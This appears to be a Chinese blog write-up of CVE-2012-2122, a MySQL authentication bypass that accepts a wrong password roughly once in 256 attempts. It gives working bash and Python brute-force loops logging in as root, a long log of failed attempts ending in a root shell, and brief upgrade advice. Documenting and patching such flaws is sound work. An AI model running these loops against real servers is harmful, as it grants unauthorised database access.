(cve-2012-2122)Mysql身份认证漏洞及利用

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

 

 

工具使用和脚本：

测试方法1：

　　网上已经出了metasploit版本的相应利用工具，下载地址 

测试方法2：

　　$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done mysql>

测试方法3：

　　#!/usr/bin/python import subprocess while 1: subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()

 

如下用测试方法3：

尝试输入256次输入密码

 

relik@stronghold:~# python mysql_bypass.pyERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’(using password: YES) ERROR 1045(28000):Access denied for user ‘root’@'localhost’ (using password: YES) Reading table information for completion of table and column names You can tu off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 24598 Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu) Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement. mysql>v>

利用成功！

 

MySQL身份认证漏洞处解决办法：升级MySQL（低于以下版本的都必须升级到最新版

本：5.0版本低于5.0.96；5.1版本低于5.1.63；5.5版本低于5.5.25）停止mysql,备份整个mysql安装目

录,data目录（这个步骤只是预防升级失败）。